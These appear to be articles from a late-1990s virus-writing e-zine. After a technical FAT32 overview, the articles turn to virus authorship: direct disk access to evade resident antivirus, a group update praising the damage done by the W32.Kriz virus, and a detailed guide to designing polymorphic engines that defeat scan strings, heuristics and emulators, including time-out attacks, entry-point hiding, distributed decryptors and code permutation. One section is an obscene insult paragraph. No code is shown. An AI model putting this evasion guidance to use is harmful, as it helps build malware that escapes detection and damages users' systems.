additional bits. However, thinking about maximum 6/6/12 bits or 6/8/10 bits leads to same results. But some of the BIOSes (IBM based) supports only 4 bits for head, and, of course 10 bits for track. In result it is 63*16*1024 sectors (each 512 bytes) which is nearly the famouse 512MB limit. Those disks in old times uses disk managers in order to overcome this limit under all bioses (usualy emulates int13 call using controller commands performing LBA accessing). LBA introduced in that time means Logical Block Adress - avoiding old geometry adressing (track/head/sector) with logical sector number. Well, 512mb limit is over, but there is another limit - given by maximum accessible number of 3 bytes use for old-style access 63*64*4096 - an 8GB limit. By the way - MS-DOS (and Win95/98 as well, as it still relies on old dos routines) has trouble using head 255, and disks must be mapped as maximum 255 tracks (0..254 which can be handles by msdos). Here you can see, how big is Microsoft's influence to hw manufactures due to bug in very old OS the still presents hw which overcomes these problems. Moreover - none of disks I seen within last 2 years uses real geometry but instead of it they use internal translation of geometry from logical that is indicated to bios and dos, into physical. Well, it is unbelieveable that todays disk has 255 surfaces which means 128 physical magnetic disks with surfaces on both sides - how you can fit it into disk package aprox inch of height? ;-) Well, back to 8GB limit of old style adressing (which must be there, otherwise DOS - and its graphical frontend called Windows can't be started). This can't be simply bypassed this way by increasing some bits. A new routines for reading must be introduced. Have a look on current partition table code and read: A old routines 13/02 are still there, but preferable it uses new EDD functions (Enhanced Disk Drive - originaly found in Phonenix BIOS, but available in AWARD as well). It is detected by calling 13/41, and accessible via 13/42 using qword LBA for adressing sectors. This qword can't be extracted from old adressing bytes as there isn't enought bits to cover all the needed information. Thats why begining relative sector is used which has dword size. Of course, introduces a new limit of 4G sectors = 2TB. Too bad, isn't it? Disk size is rapidly increasing, hope these structures will be changed within next years. Also there are four new filesystem codes for partition table entries for FAT32 disks: 0Bh 0Ch 0Eh 0Fh
- FAT32 (32bit fat, up to 2047GB) - FAT32x (same as FAT32, but uses LBA-logical block adress for accessing) - DOSX13 (same as 06h - 16bit fat for larger partitions than 32MB, but with LBA accessing) - DOSX13x (same as 05h - extended partition, but with LBA accessing)
Logical disc structure We can now access disk and its sectors. A logical disks follows - organisation is nearly unchaned - for compatibility reasons. A boot sector and reserved sectors take a place, two copies of FAT, and clusters containing directories and files. Now, as in whole FAT32 implementation I can present two news: bad one and good one. Good one is that Microsoft is learning on his old mistakes and corrects them - root directory has no longer fixed position, and is located in separate cluster - so it can be expanded more than limited number of items like in previouse versions was. Bad news is that MS still stays on bad and unreliable filesystem, with slow access, not statisticaly optimized for files typicaly used. Of course, there is NTFS but people still prefer FAT-based filesystems.
Boot sector Boot sector is no longer a sector. Funny, isn't it? We should better call it boot record (or superblock for linux freaks) because now it is stored in first three sectors. Moreover it is usualy mirrored by default to sectors 6-8 (a hotlink backup of boot sector) but its coordinates are stored in bootsector, so once it lost you generaly can't find a copy :-) Here are offsets and meaning of values in boot sector(s), presented in linear offset which means offset 0x0200 means sector 1 offset 0x0000. Code is now stored in sectors 0 and 2. OEM ID (8 chars) usualy "MSWIN4.1" (or 4.0 for Win95) bytes per sector (word) always 512 for hard-disks sectors per cluster (byte) reserved sectors at begining (word) usualy 32 but can vary (with sector 0) fat copies (byte) always 2 for hard-disks media descriptor (byte) always F8 for hard-disk sectors per FAT (word) 0 for FAT32, as FAT can be really long sectors per track (word) default contains translation mode values sides (word) special hidden sectors (dword) usualy 63 big total number of sectors (dword) big total sectors per fat (dword) FAT flags (word): 0-based number of Active FAT - i.e. fat beeing in use (bits 0-3) valid only if mirroring (bit 7) is disabled, bit 7 - FAT mirroring enabled, bits 4-6 and 8-15 are reserved. In other words, you can avoid using fat copy that contains physicaly damaged sectors - but someone have to turn it on :) 0x002a: filesystem version major (byte) 0x002b: filesystem version minor (byte) - 0.0 I saw so far 0x002c: first cluster of root directory (dword) 0x0030: FS sector number (word) - usualy 1 - where rest of boot record is stored - FileSystem informations (0FFFFh if there is no FSINFO sector, otherwise must be more than zero and less than reserved sector count) 0x0032: hotlink - backup bootsector (word) - usualy 6 (same as above: 0FFFFh for no backup, 1..reserved-1 otherwise) 0x0040: physical drive number (byte) 0x0042: extended boot record signature (byte) - 0x29 0x0043: volume serial number (dword) 0x0047: volume label (11 chars) 0x0052: filesystem ID (8 chars) - "FAT32 " 0x01fc: signagture (dword) aa550000 0x0200: extended boot signature (dword) - 41615252 "RRaA" (wow! no Mark Zbikowsky and his 'MZ'everywere anymore, seems Bill employed someone else ;-) 0x03e4: FSINFO signature (dword) - 61417272 "rrAa" 0x03e8: free cluster count (dword) - as it takes long time to go through whole FAT, number of free clusters is stored here (0FFFFFFFFh if unknown) 0x03ec: next free cluster (dword) - to speedup free space lookup 0x03fc: FSINFO ending signature (dword) aa550000 0x05fc: signature (dword) aa550000 0x0003: 0x000B: 0x000D: 0x000E: 0x0010: 0x0015: 0x0016: 0x0018: 0x001a: 0x001c: 0x0020: 0x0024: 0x0028:
FAT - 32bit File Allocation Table
by skipping reserved sectors (usualy 32) you can reach file allocation table. Rest of reserved area is cleared, only boot sector(s) and its backup can be found there so far. But in future, who knows. Signature itself starts with known F8 FF FF 0F pattern. First cluster can't be used (as from passed), its value in fat is initialized to FF FF FF 07. The rest contains fat data itself, starting for cluster 2 at offset 8 in fat. Principle of fat lookup is same as before, but now uses structured 32bit value: 4+28bits, low 28 bits for cluster number (FFFFFFF for end of chain, FFFFFF8 for bad), upper 4 bits are reserved and Microsoft requires to preserve them when modifying FAT entries. Representation in stored form is, for example, FF FF FF 0F for end-cluster. FAT can be very long - up to several thousands of sectors, which of course slows down all operations. As caching it takes lots of memory, which is unreal with buffers available under DOS. But this makes disks to surrive CIH's attack, as it destroys first 2000 sectors of disk, but if you have FAT32 (really long), second copy of fat is usualy untouched - all you need to do to repair disk after CIH is to copy second fat into first, construct boot sector (copy from other disk an type-in correct values) and write some numbers into partition table. Resulting few minutes of work - and disk is repaired like nothing happened. With infected files of CIH too, of course ;-)
Directory entries I will not speak about LFN entries, as they are already well known I think. All I want to describe where the 32bit cluster value is stored. Low part of cluster number is at the original location, word at +1a bytes in directory entry. High word is stored at +14 in this entry. Both of them are real index into fat, like under old fat16/12 system. I also should mention, largest possible file on FAT32 is 4GB minus 2 bytes.
My short description is now over. Are you happy about FAT32 features? Where the hell are features? All is done as usual - Microsoft extends all stuff in order to keep it working, keeping all fears alive. There is no way to relyie on old traditions but MS breaks the limits - just like with dos7 and its graphical interface - keeping all the bugs as tradition that came from win 3.1, old dos, cp/m, etc, etc... flush
MGL originally placed here my older routines to read/write directly to controller and afterwards I added a fat12/16/32 emulator. However, I decided to throw it all away and better to discuss why I throw it away. Because it simply can't work... Let's start with a little question: Do you use direct disk access in your piece of work? (or would you like to?) Don't do that! There are many reasons why - but you have to think a bit and you'll sure find some of them. A time ago virii beats each other in tricks how to pass blocking systems, to write on such a disks, or not to be caught by resident scanners. Today this idea also looks good - to access disks without having operatings system know about it, you'll not be found by any resident avir of course (under Windows as well). Its like entry-point tunneling routines. They usualy works - but only under laboratory contitions. And you have to be prepared for real life. If vx can't surrive in real, it is unusable - no matter if it replicates on your machine once it doesn't work on others.
The reason is simple - Microsoft designed all its residental drivers and windows modules in a same way placing all one over another, without exactly defined interface, so anyone can do what he wants as long as he is consisted with upper and lower level. Yeah, it works well, but you have to: take care about order of loading of such a modules, know what is each module for and what data it has cached. And this is why it can't work under DOS nor Windows. In dos, for example, nearly every filesystem-based utility had to be resident on interrupt 21 creating some sort of chain of drivers, one depending on another. There is also posibility to register some of your dispatchers directly into dos, but you had to know internal dos stuff to do so - and it is of course slightly limited (but is a bit a thing I mean). Well, so there are many drivers hooked over int 21, cache, novell netware disk, resident antivirus (thats why we talk about it too). You can write some cute program that can work on disc without all this I mentioned (no matter if you are just bypassing some drivers, or directly emulation filesystem) - on more complicated systems like I mentioned before you will cause a disk-crash. At first, you can't access disks created by such drivers. Then, driver might have something in their buffers, and you have no possibility to tell them to flush them. In this case, for example writing to disk a data area that is also cached by some cache program, and in couple seconds later, cache flushes its buffer to disc discarding your change. And if it happens in FAT - you can easily imagine what can happen. Of course, there is possibility to comunicate with such a programs, but as there is no common interface, you can't communicate with all-inthe-world drivers. And your virus can be easily noticed by a disk inconsistency or even disk crash this way. Conclusion? Well, you can do some direct things under dos, but remember always to keep everything consistent - not only with programs you have on you computer, but with programs other users may have.
Under Windows 9x is this situation a bit simmilar. At first, to avoid direct hardware manipulating and to keep system more consistent there is a hardware virtualization. But you surely know how to fool it - it is quite easy as you can enter Ring 0. As more things are integrated into windows now (networking, variouse disks are attached using hardware device manager, cache is build-in, etc) these things becomes more unimportant every day. And finally, third-party programmers now produces plug-ins for this OS (Windows) instead of extensions (like for DOS). However, I heard some ideas to access disk directy but the reasons why it will not work are same as above. Also a disk access dispatcher entrypoint can be rehooked as well under Windows
but if you want to bypass software that is resident in this way, keep in mind you have to do it consistently as well... And... Good luck and don't be caught by lusers due to problem in your piece of work you didn't figure about... flush
Introduction First of all, let me inform you that this is no "Diary version II" contribution to this excellent zine. It is just an efford in keeping good, healthy traditions alive, if there's is such a thing. Anyways, since Mgl asked me to write a little something about "What's up since IR/G?" I couldn't deny him that. If you feel like you don't want to hear anything further concerning Immortal Riot and are sick tired of my (I=The Unforgiven) contributions stop reading right now. Then execute some nifty version of w32.Kriz on your imaginary-girlfriends' computer, connect to your virtual social life and try to hack your way out from your pity life and if you can't, well go fuck your boyfriend in his arse so you'll wake up the next morning with dry cum in your hair and shit and pubic hair in your right nosdril. If you however decided to continue reading, live long and prosper!
Background Immortal Riot was formed in 1993, which in a few words is quite some time ago. Think about 1993 for a few seconds. 1993 lacked a lot of things we today are taking for granted. To name a few examples, email, www, cellular-phones, Fast-Ethernet, Video-on-Demand, MP3, JAVA, Pentium, CD-recordable-devices, DOOM, digital&web-cameras, distance-jobs, online shops/zines/banks, the official Immortal Riot homepage, cheap media and other things.
The bad old times? Of course, some of you folks could actually access a few of the things mentioned above, but the scene was very different "back then". People would call different 'underground' BBS'es (often with) calling-cards and upload different stuff (often warez) and BBS-sysops would have a few "mail-nets" (like CCi/NuKE/FIDO) and everything worked OK with a 14400 bps modem. This is now considered the stone age and even though I liked playing games like Civilisation and WOLF-3D, writing trivial COM infectors, plaguing fido-net and so on, it comes a time when one realises that it's time to move on. When others moved on my learning JAVA, HTML, CGI, setting up www&ftp-sites, coding viruses for other platforms than DOS (Win95) I decided to take a step back and learn other things in life. I did however felt that Immortal Riot deserved to live on even though I decided to drop. I left the organisation to Sepultura and things was going steady, but Sep was left on his own and did pretty much about everything. I guess he felt like he needed some assistence and after a while IR turned IR/G as a possible solution. IR/G released Insane Reality #8 and now we've reached the topic for this article.
What's happend since IR/G Since IR#8 all members of IR/G once again turned lazy and decided to hang lose (i.e. do nada and enjoy the fame of being in the leete group IR/G. *joke*...). Well, the truth might be something like this. IR/G was organised by Rajaat and Sepultura and they had both been around for some time and perhaps they didn't
feel like organise IR/G anymore. I can't really answer why IR/G turned out as a failure since I wasn't around much but fact is that after a while (I dunno exactly how long) we (Immortal Riot) splitted with them (Genesis) due to unknown reasons and everything was silent (from both groups) for a very long time.. However, since "We splitted with Genesis due to unknown reasons" isn't exactly what I believe Mgl would like to publish in an article-entry I felt like had to ramble on about some other things and far more interesting things, for example where we're now.
Immortal Riot 1999 You could say that IR have a lot of members. I don't quite know exactly who're a member and who are not but that's not really important either. What's more important are the active ones. T2 are responsible for a lot of good, naughty viruses which all has tormented to world and the best example is perhaps w32.Krized. It's been reported here, there and everywhere and even though it only fuck-ups the computer once a year (go check when on http://www.coderz.net/ImmortalRiot) it has caused a bit of panic. T2 joined IR about a year ago and has ever sinced been giving computer-users around the world a hard time. Another new member is Captain Zero and we are all waiting for his projects to be distributed. Then how about Insane Reality ? Well, what can I say... If someone feels like organising a zine, please contact me. We have a lot of code to publish but lack some text-material. It's a great challange and a great fun to release a zine and you shouldn't miss this oppurtunity! If you currently not are a member of IR this is something that could be arranged.
IR for the future I have no clue, the future tend to have a few suprises up hers sleeve so I won't dare to mention anything about it. If you know something I don't, don't hesitate to mail me (
[email protected]).
Greets Greets goes to every one in who hanged on efnet #virus back in 1994 and actually TALKED and BREATHED viruses! :). Please Email-me! Of course, greetings to all new IR members who can continue where the old-timers left off and bear our colors with a great pride! Special thanks must however go to T2 for being an excellent representative of Immortal Riot. God bless you! IRONY! :).
How to contact us I can be reached on my hotmail adress, which is
[email protected]. All changes, code-updates and other new information will be up at our official site located at http://www.coderz.net/ImmortalRiot (where other IR-members also can be reached).
Disclaimer
This is only my version. If you think it's false, fake, untrue, or whatever, write me a little something and we'll somehow fix that. Don't held me responsible for being a goofball :).
Closing Words Enjoy the next millennium, your life, your time on the earth, don't waste it, do whatever makes you happy and never hesitate to leave things which aren't healthy for you. - The Unforgiven/Immortal Riot.
This article deals with a viral technology that has been widely documented, discussed and implemented. However, it is aimed at explaining certain design flaws in current polymorphic engines and proposing solutions for these flaws, as well as suggesting improvements to current technology. The discussion will present an overview of the history of polymorphism pertinent to our subject, anti-virus detection methods, and will present concepts needed for properly designing polymorphic engines with a view to their survival in the wild. It will also include a section on structuring and writing polymorphic engines.
The Evolution Of Polymorphic Engines And Their Significance. The history of polymorphism began with experimentation. Virus authors recognised the susceptibility of their viruses to scan strings and encrypted their code. Even then, the decryptors were fixed, so anti-virus software generally had little trouble with a virus that was analysed and for which a scan string was extracted. A number of authors would rewrite their viruses to create strains which weren't scanned for at the time. A select few, however, started experimenting with new technology. A German programmer going by the handle of ~knzyvo} implemented dynamic encryption into his Fish family. The Whale virus, however was a more notable event. 30 different encryptors were used for this virus, which meant the anti-virus researchers had to include multiple scan strings. Dark Avenger's Phoenix family would modify bytes of their own decryptors, thus forcing anti-virus software to use wildcard scan strings. An American anti-virus researcher named Mark Washburn wrote a family of viruses that would generate a different decryptor altogether for every time the virus would replicate. The real breakthrough in polymorphism was, though, the release of Dark Avenger's Mutation Engine, or MtE. This engine was distributed in a form of an object linkable to a file, and was what started the revolution in the way viruses were written. Anti-virus researchers were at a loss. The traditional methods of detection were obsolete, since this engine would have needed 4.2 billion signatures, many of which might be present in legitimate programs. Instead, most anti-virus researchers opted for methods like algorithmic scanning checking whether or not code in question could be produced by a polymorphic engine. Several months later, anti-virus software couldn't reliably detect MtE-generated decryptors. A second blow came to the anti-virus industry with the release of Trident Polymorphic Engine, written by Masud Khafir. A more complex algorithm was used for producing encryptors, and again, anti-virus researchers were left with the task of reliably detecting TPE. While the decryptors themselves weren't particularly sophisticated, they could easily be mistaken for encryption used in commercial software, and later, several other engines would be mistaken for TPE samples. A new concept was introduced in 1993. Neurobasher's new Tremor virus spread widely in Germany. It seemed to researchers that a suitable algorithm was devised for its detection, yet, the virus continued to elude scannes in the wild. After thorough analysis of the virus's code, it was found that instead of generating random numbers, Tremor would use relatively immutable data to create its permutations. New strains would be generated every, say, full moon or on infecting a new system. This meant that the anti-virus researchers would need to spend even more time and effort on analysing a polymorphic virus lest they release an incomplete algorithm.
Meanwhile, across the channel, a British virus writer known as the Black Baron released his polymorphic viruses built around an engine called SMEG. This engine introduced the concept of generating decryptors with large amounts of junk instructions present in the decryptors. Once again, scanners had difficulty when confronted by a new polymorphic beast. It took a much longer time to analyse a piece of code and determine whether or not it was encrypted by SMEG by picking out the decryptor from the junk. [MGL's note: If you take closer look on SMEG, you will get the point - generated decryptors are huuuuge ] From 1992 to 1994, an unknown researcher in Uruguay busily created a family of 10 viruses, each more polymorphic than the last. The novelty of his approach rested in tracking the code that was generated, and producing decryptors that looked even more like the real thing. It became difficult to distinguish polymorphic decryptors from real code. Another 1994 engine that made a significant impact on the anti-virus industry was DSCE. Dark Slayer stated that his decryptors contained no loop, key, or start-up values. In a way, he was correct. However, it's an exaggeration of what the engine really did - these structures were concealed in a massive (at the time) decryptor by point-encrypting the opcodes that resembled a decryptor loop. Once again, scanners were slowed down by having to analyse the decryptor in depth. While there are several other polymorphic engines just as technically advanced as those mentioned above and the authors of which deserve just as much recognition, these are the ones that we need to illustrate the design of a solidly built polymorphic engine.
Polymorphic Virus Detection Methods. So, what methods are used to detect polymorphic viruses in the wild? And what weaknesses of the polymorphic engine design do they exploit? These are questions particularly interesting to any aspiring writer of a polymorphic engine. It must be understood that anti-virus software developers often implement the lowest-grade working solutions. For instance, when Whale appeared, multiple scan strings were used instead of an algorithm. When MtE appeared, an algorithm was used instead of more sophisticated methods of analysis such as single-stepping through the decryptor or emulation of the decryptor code. So, a virus sufficiently advanced to defeat currently available methods of detection would instantly get a time window that would give it a chance to spread in the wild. Well, let's take a look at what we're up against. Scan strings this is something a designer of a good polymorphic engine should not worry about. You do need to keep in mind that any sort of structured code fragments in your engine, such as anti-debugging code or anti-emulation code can be scanned for and used to aid a scanner in analysing a piece of code. A small set of fixed chunks of junk code can also be detected if the decryptor is scanned with several scan strings that allow for wildcards. Algorithmic analysis again, something not commonly used in our day and age. This works by analysing the code, and deducing the file is infected (or not infected) if certain conditions are met - for instance, if a decryptor structure is recognised or if the scanner finds an opcode that couldn't have possibly been generated by the engine. Statistical analysis this is a specialised form of algorithmic analysis that counts up the incidence of certain opcodes and code structures. This method is still used quite heavily in heuristic engines to set off an alarm if a file contains code that does not "look" naturally written or generated. Of itself, it is of little use.
Int 1h tracing also known as single stepping. I don't know of any anti-virus scanner that uses this antiquated method of examining the code, however, Thunderbyte's TbClean program utilises the int 1h single-step mode to disinfect files. Defeating this method is simple enough, but it's usually not worth including the code, simply because it's so little-used. Cryptanalysis attemps to crack the virus's encryption and find a scan string underneath. While it's rarely used, it can be very effective against a fair number of polymorphic and encrypted viruses. Once again, though, defeating it isn't usually worth the effort. Heuristic scanning this method was originally developed to find viruses unknown to the virus scanner in question. However, the anti-virus software designers have caught on and are now using it to detect unnatural looking code which is often found in decryptors of polymorphic engines. Emulation this is the method currently relied on by anti-virus software to detect most polymorphic viruses. A piece of code performs the function of a fairly complete CPU and executes the code in question in a controlled environment until it deduces it has emulated far enough, at which point a scan can be performed for a fixed signature. All the work that went into a polymorphic engine goes rightdown the toilet bowl.
Polymorphic Virus Detection Countermeasures. A properly designed engine should aim to generate code that is as obscure and difficult to detect as possible. Here's a simple point-by-point guide to stopping most detection methods. Scan strings this is should be avoided by proper engine design. By proper engine design, I mean that any and all code produced by the decryptor should be completely variable - at least one alternative per every opcode that is used for any structure. Algorithmic analysis this should be combatted by including at least 80% of all 80x86 opcodes, and all of the commonly used opcodes. The more variability here, the more difficult it is to disqualify a file as a potential carrier of the engine, therefore it becomes difficult to identify all of the infected files without false alarms. Statistical analysis this also depends on how the engine is structured. A few engines include a lot of one-byte instructions that mess around with the flags, nop's, hlt's, lock's, or whatever. Do not do this - any statistical scanner worth its salt will pick out the file with 25 nop's and 19 clc's in a 380-byte area of code. I'll elaborate on this in the section that describes the engine structure. Int 1h tracing the countermeasures for this are well-known. Most stack modification instructions, flags tests and other such anti-debugging tricks will stop a simple tracer. Prefetch queue tricks are inadvisable to use here since it is difficult to design ones that will be compatible with all processors, past, present and future.
Cryptanalysis this technique relies on the fact that a lot of viruses will encrypt their code with simple operations like a single 8-bit xor loop. This is often true. However, doing several mathematical operations on every byte will quite easily defeat this method, as it will need to try a large number of combinations to find the right encryption algorithms and keys. The use of sliding keys once again makes the job more difficult, as the right key modification operation has to be found for every loop. Heuristic scanning this relates to statistical analysis, especially so in polymorphic engines. The key to avoiding producing heuristically sensitive decryptors is structuring the engine in a way that would ensure that the generated code appears to look like natural code written by a human being and assembled by an assembler. This means, among other things is that all of the opcodes a polymorphic engine generates must be in their shortest form. A point that must be noted here is that heuristical analysis is used to determine whether or not the code should be emulated. If your virus passes the heuristic checking, it won't be emulated to start with, or the emulator will stop before the virus is decrypted. The two are a part of one mechanism, where defeating one will stop analysis completely. Emulation defeating this method alone will significantly reduce the number of your virus samples anti-virus programs X, Y and Z will detect. To defeat this method though, one must have a good knowledge of the emulation system or systems in question. Well, here's the good news: the emulation systems used in anti-virus software are quite inferior in that they are often incomplete, sometimes buggy. This is most often intentional. Why? Well, most encrypted or polymorphic viruses use a limited instruction set in their decryptors. This means there are instructions left out of their instruction sets. The wider variety of instructions your polymorphic engine can generate (in context, of course), the better the chance of stopping an emulator. Emulators will also restrict the virus's function, so something as simple as writing to a memory location and testing the write can detect an emulator's presence. However, there's a more serious threat to an emulator attack. Most emulators are designed for speed. Therefore, a counterattack on an emulation system that will always be effective should be designed to bleed off as much of the time as possible. This accomplishes two goals - the user will prefer a fast, unreliable scanner over a slow and reliable one, and it would take an emulator a long time to detect the virus decryptor. Of course, an emulator could time out assuming it's emulated the code too far and quit emulating, which is a complete victory for the virus author. An example time-out attack could be orchestrated in the following fashion. The virus is encrypted and written to disk, but the key is not saved. To derive the key, some sort of checksum of the unencrypted code is saved. The virus is decrypted with a random key, the checksum is calculated, and the two checksums are compared. If the two checksums do not match, the virus is re-encrypted with the reverse operation and the process is looped back. This makes for a larger, more sophisticated loop, which an emulator must go through hundreds of times, magnifying the relative slowdown. Anti-virus emulators are built with avoiding infinite loops in mind, so perhaps an emulator will skip such a structure. [MGL's note: For example Spanska's IDEA.6126 uses above described approach ] Another time out strategy is building complex decryptors. This will be further explained in the section dedicated to engine structure, but the premise is that the more code the emulator has to execute, the slower it will be. Therefore, a decryptor containing a moderate number of conditional jumps, calls to subroutines, and other such structures will be slower to emulate than one that's purely linear.
Designing And Structuring A Polymorphic Engine.
A polymorphic engine is no trivial task to write. Much of the overhead can be reduced by setting down an appropriate structure for the engine and organising it according to that. The function of a polymorphic engine is to encrypt a piece of code and produce a decryptor that will then decrypt the encrypted code. The decryptor that is produced must be as variable as possible. To achieve this, and to make analysis more difficult, a polymorphic engine will usually be written to produce: Decryptor loop one or several loops in the actual decryptor code that would be selected from one of several loop types where the individual instructions withing the loop would be modified. The algorithms used to perform the en/decryption would range from common XOR loops to esoteric int 1h tracers that would decrypt individual opcodes as they were executed. Junk instructions opcodes written in before, after or in between the decryptor loop itself to disguise the presence of the polymorphic decryptor in the infected file. This has traditionally been a problem area for most polymorphic engines, as the junk produced was not within the statistical bounds of regular code. More recently, virus writers have paid more attention to this, and more complex code structure has been created by latter-day polymorphic engines. Armouring code this has been widely explored, and the approach here was to traditionally generate code fragments ranging from stack tricks to int calls. The purpose here has been to stop analysis by anti-virus software and people analysing the decryptor, either by using an emulator or a real-mode debugger that would step through the code by utilising the 80x86 single-step mode. Anti-heuristic code I've seen only a couple of engines that use this particular sort of code. The purpose here is to obsfucate the decryptor by concealing the actual decryptor instructions.
Here, I would like to both compliment a virus writer for his achievement and expand on his idea to suggest a new design standard for advanced polymorphic engines. Almost 4 years ago, a virus was published in an underground virus exchange e-zine called 40Hex. The name of this virus was Level-3, and the author was then-famous Vyvojar, who had by then firmly established himself with the notable One_Half virus. [MGL's note: according the Vyvojar One_Half virus was written to demonstrate virus with maximum spreading abilities while One_Half successor Level-3 was demonstrating use of hardcore poly encryption. ] The design of the engine was revolutionary - the engine would generate the decryptor code, and then emulate it to determine the instruction flow. This concept is quite similar to the ideas I was working on at thetime, which leads me into the design structure of an engine that would be extremely resistant to most analysis methods. First of all, all of the code the engine generates would have to be emulated by its own internal emulator. This means the contents of the registers can be quite easily tracked by the emulator and the levels of complexity will be increased to a great degree. For instance, when a value like a key, start of the encrypted area, or any such area is required, the engine can quite simply fix up the values already held in the registers. The values on the stack would be emulated too. The possibilities here are really much bigger than the simple variation that can be achieved by setting down sets of rules for generating code. Secondly, all of the 8086 opcodes should be produced by the engine. However, they should be produced in different frequencies - for instance, an average decryptor would usually contain about 80% of the 8086
instruction set, with the remaining 20% generated in 1 out of 20 samples. The garbage generation can be handled by building tables which would be accessed with different probabilities. Of course, producing 80386+ opcodes, or floating point coprocessor instructions would increase both variability and make the engine harder to emulate. Remember, no emulator is perfect, and most anti-virus emulators cannot handle complex instruction sets in decryptors. Thridly, the structure of the decryptor itself should be complicated by such things as calls and conditional jumps. The reason for this is quite simple - it facilitates emulator slowdown. For example, 3 calls to a 20-byte subroutine are equivalent to 69 bytes of code. Conditional jumps are very useful for slowing down the process too. Emulators will attempt to emulate every path that is available if it cannot be predict the direction of the jump - a technique known as path emulation. One jump that cannot be predicted by an emulator means the decryptor will have to be emulated twice. Two such jumps mean the decryptor will have to be emulated four times. Structures like this ensure that a small decryptor may take as long to emulate as a very large decryptor. Finally, a word about layers. It seems that a lot of people believe a higher number of layers will ensure adequate protection. This protection is only there in so far as the emulator will simply take as long to emulate the layers as it would for a single decryptor of the collective size of these layers. There is a restriction on the largest possible size or the largest number of layers that has to be made, and it seems optimal to maintain only two layers, one to fool heuristic scanners into thinking it's legitimate code and decrypt the second one, and the second being a simple cyclical decryptor for the rest of the virus. I hope that this has given you an insight, insiration or ideas to implement. Good luck with designing your new super-polymorph. ;)
Special thanks to MGL, Pockets and Owl for their invaluable ideas and suggestions. Greetings fly out to all my friends in the scene. This document is © 1998 Buz [FS], and may be distributed so long as the correct copyright of this document is stated, and it is not modified in any way. Any medium in which this document is distributed in must be free.
Polymorphism is for viruses one of the must. Buz[FS] brings us some valuable ideas for the coding. His paper is very consistent and good written. But there are several ommited things that we should mention.
Brute-force decrypting Interesing idea of complicating scanning, first it was shown in real life by virus IDEA - because it uses cryptographic algorythm named Idea to encrypt its body. It pushed time of emulation of such a decryptor to the limits so antivirus will abort its emulation on time-out. Because even virus itself doesn't know decryptor key and it tests all combinations to find it out. It tooks for example a second, but for emulator in antivirus it will took tens or even hundred of seconds - which is not acceptable of course. But you should keep in mind that it is enought for antivirus to detect decryptor (or even less specific things) to signalise a virus, and there is no real need of such brute-force key finding for antivirus. But if this algorythm is polymorphics enought and antivirus can't detect any scheme in it, this will really work pretty well. You should also keep in mind to use a good cryptohraphic algorythm (not a simple xor) becase otherwise antivirus can perform a cryptographic analysis faster than is your key-finding routine.
Opcodes variability You can hear in these days: this poly engine uses fpu instructions, another poly engine uses pentium opcodes, and other one using mmx opcodes. All this sounds good, but is not compatible at all. For example older Cyrix or AMD cpus doesn't have MMX at all. And there are pentiums without mmx and even 486s as well. On those your virus will hang - ant that is best way of its detection by lame users. Yes it is good to use many specific opcodes, because it will be harder to identify and harder to trace. However you should not use opcodes that are incompatible. How to solve this? Well, my suggestion is to have some extra opcodes enabled by a special flags. Because PEs are basical i386 compatible, you should stay at this level for regular files. But when a virus is going to infect system files to establish itself a home on new computer (like installing to DLLs or VXDs), you can use as many opcodes as current machine supports. Because there is no chance (or very little) that these files will leave current computer. But for transfering virus, you don't know what processor target machine have and you should stay as compatible as original file you are infecting is (to check a CPU flag in PE header). For these reasons, you can read another our article about opcodes.
Entry-point hiding Now, we have to break most common definition of polymorphism associated worldwide. Everyone understoods that polymorphics virus means virus stored in file with fixed body, with generated decryptor to decode fixed body. It is used to prevent easy detection of body instead of it, a generated decryptor must be analysed and detected. But it is not right. This is only way how everyone knows it, however there are also other techniques that breakes this rule. Entry-point hiding, firstly very successfuly demonstrated in Dark Avenger's (in fact inventor of now known polymorphism) piece of code called Commander Bomber. Commander bomber leaves its body completly visible (what a lucky for avers), but you dont know where it actually is. It infects only com files, so whole file can be scanned of course to detect it (a weak point of this
virus), but in general you don't know where the body is: there are several fragments of code, place anywhere in host file, that are connected with jumps, contitional jumps and call/rets as well. As it is generated (as well as for classic polymorphical engines) it is hard to identify if fragment of code belongs to Commander Bomber or not. Commander Bomber uses excelent code generator but imho Darkie wanted not to have it encrypted to simplyfo work of avers. No matter now. This technology is hard to scan, because antiviruses are not loading a whole file (imagine running this on 1mb PE), and simply can't reach body by following all code fragments.
Distributed decryptor This is some kind og combination idea of hiding entry-point mentioned above with decryption routine. In normal poly engine the situation is similar to figure 1 while distributed poly decryptor look like on figure 2 fig. 1
fig. 2 infected host part
infected host
decryptor part
infected host part
decryptor
decryptor part
encrypted body of the virus
infected host part encrypted body of the virus
infected host part
Prelude to the topic distributed decryptor has been written by Bulgarian programmer known as Dark Avenger in his Commander Bomber virus (already mentioned). The first real (as far as I know) but weak implementation of distributed decryptor can be seen in Vyvojar's One_Half virus with its decryptor divided in 10 parts. However, it was really easy and we should not call it really polymorphic as encryption schema was pretty visible even for stupids. But even as it was so simple, it complicates life to avers really good. May be you remember. And what would be the perfect distributed decryptor? Imagine decryptor spread all across the host file, with no specific locations, emulated of cos, code fragments linked together with conditional and unconditional jumps, calls, loops combining linear and cyclyc structures, time-out attacks, armouring and anti-debug code. Easy to say, harder to code but why not to try it? A demonstration of this is for example Vyvojar's EMM3 (Explosion Mutation Machine 3).
Permutated virus code We can't stop the way of polymorphism on encryptor level. Another level of polymorphism - permutated (we can call it polymorphical, if you want) virus body itself. It is the easier degree of having whole virus in different
way every time. It was firstly demonstrated in Ender's TMC:Level_42 that we have also available in this issue (or bugfixed version TMC:Level_6x9 - if you know Hitch Hiker's guide to the galaxy). TMC stands for Tini Mutation Compiler, which is not a good name in fact - because it is a Mutation Linker instead. It is able to place its own code fragments to different locations breaking them at instruction level, connecting these fragments with original conditional jumps or generated jumps, and link all the jumps and memory references to correct offsets. We can define code permutating as changing memory position but keeping code-flow of virus code itself. This is rather enought to cause big problems to scanners, as they have to catch all the samples. By choosing any string avir might fail as virus can be breaked within a string and will not be detected. For doing this, virus have to have its own code stored in some form capable for permuattion (that have linking information), or to have some rules how to permutate already running code (and some way to keep linking information as well).
True polymorphics Can virus body be really different for every instance at the instruction level? Well, nowadays there isn't any virus doing this. However I think it is possible. Because there are many ways how to program same subroutine (that even uses same algorythm) and can be completly different at binary and instruction level. It is most probably needed to have some pre-compiled form that will be assembled each time, instead of using its own code as an template (it might be possible, but even much harder to implement). These ideas are more detaily written in Navrhar's article discussing this called ASM vs. HLL.
